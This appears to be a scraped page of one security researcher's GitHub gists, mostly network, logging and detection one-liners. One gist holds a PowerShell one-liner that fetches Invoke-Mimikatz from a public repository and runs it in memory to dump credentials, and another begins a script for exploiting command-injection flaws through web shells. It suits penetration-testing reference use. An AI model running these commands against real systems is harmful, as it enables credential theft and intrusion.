@gfoss
gfoss / nslookup loops
Last active April 20, 2022 16:45
Basic nslookup loops for Windows and Linux
*****WINDOWS*****
//nslookup - subnet range
c:\>for /L %i in (1,1,255) do @nslookup 10.10.10.%i [server to resolve from] 2>nul | find "Name" && echo 10.10.10.%i && @echo [ctrl+g]
//nslookup - file of ip's
NAME c:\>for /F %i in ([file.txt]) do @nslookup %i [server to resolve from] 2>nul | find "Name" && echo %i
ADDRESS c:\>for /F %i in ([file.txt]) do @nslookup %i [server to resolve from] 2>nul | find "Address" && echo %i
Or just run c:\>nslookup and paste in the list
@gfoss
gfoss / netcat heartbeat
Last active May 30, 2016 06:27
NetCat based heartbeat one-liner, great for pentesting to let you know if the service you are testing has crashed.
$ while nc -nn -vv -z -w3 [ip-address] [port] > /dev/null; do echo "OK"; sleep 1; done; echo "DOWN"; while true; do echo "***DOWN***"; sleep 5; done
@gfoss
gfoss / ssh-alert-cronjob
Last active December 12, 2015 02:38
simple cronjob to alert on 'unknown/unexpected' access to a system.
0 */1 * * * last -5 | grep -v '[user]\|wtmp\|reboot\|shutdown' && last -10 | grep -v '[user]\|wtmp\|reboot\|shutdown' >> ~/Desktop/ALERT && wall -g [group] ~/Desktop/ALERT
@gfoss
gfoss / ssh-attempts.txt
Last active December 30, 2018 11:02
grep IP addresses from auth logs to see attempted ssh attempts into your box w/ invalid creds {ubuntu}
#search for invalid logon attempts, pull out IP, remove dupes, sort...
$ grep -rhi 'invalid' /var/log/auth.log* | awk '{print $10}' | sort -u > ~/ips.txt
#look em up
$ for i in `cat ~/ips.txt`; do nslookup $i 2>/dev/null | grep -i name | tail -n 1 | cut -d " " -f 3; done > ~/who.txt
# :-) #
$ do moar things...
@gfoss
gfoss / nmap-os-detection
Created August 28, 2013 19:52
OS-detection. Run this nmap command to count OS's and view the os.txt output file to see the results per-system.
$ sudo nmap -F -O [IP-RANGE] | grep "scan report\|Running: " > os.txt; echo "$(cat os.txt | grep Apple | wc -l) OS X devices"; echo "$(cat os.txt | grep Linux | wc -l) Linux devices"; echo "$(cat os.txt | grep Windows | wc -l) Windows devices"
@gfoss
gfoss / autopeep.sh
Last active July 20, 2016 05:41
Simple script used to set peepingtom.py to run automatically via bash script + cronjob, serve up the content and send out e-mail notifications.
#!/bin/bash
#
# Utilizing LaNMaSteR53's peepingtom.py script to auto-scrape web servers and send out notifications.
# Optimized for Kali Linux
# greg.foss[at]owasp.org
#
# cronjob to run this script once a week every Sunday at Midnight
# 0 0 * * 0 /usr/share/peepingtom/autopeep.sh
# prepare storage location, remove old data, and migrate existing folders
@gfoss
gfoss / command injector
Created September 10, 2014 07:01
script to assist in exploiting command injection vulns / interacting with simple webshells
#!/bin/bash
#
# Command Injector v0.1
# greg.foss[at]owasp.org
# modified version of dirtshell by 'superkojiman' to exploit command injection vulnerabilities / access web shells via cli
# dirtshell.sh => http://blog.techorganic.com/2012/06/lets-kick-shell-ish-part-1-directory.html
function usage {
echo "usage: -u URL"
echo "eg : -u \"http://site.com/index.php?cmd=\""
### Keybase proof
I hereby claim:
* I am gfoss on github.
* I am heinzarelli (https://keybase.io/heinzarelli) on keybase.
* I have a public key whose fingerprint is 3DC9 DCF4 C0A3 7206 C45B 66FB C2DE DD96 D935 5D0E
To claim this, I am signing this object:
@gfoss
gfoss / PowerShell Command Line Logging
Last active August 4, 2023 18:02
Detect and alert on nefarious PowerShell command line activity
# PowerShell Audit Logging for LogRhythm SIEM - 2015
# For detecting dangerous PowerShell Commands/Functions
Log Source Type:
MS Event Log for Win7/Win8/2008/2012 - PowerShell
Add this file to your PowerShell directory to enable verbose command line audit logging
profile.ps1
$LogCommandHealthEvent = $true
$LogCommandLifeCycleEvent = $true
@gfoss
gfoss / Quick-Mimikatz
Last active October 26, 2023 09:48
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc [base64-encoded command]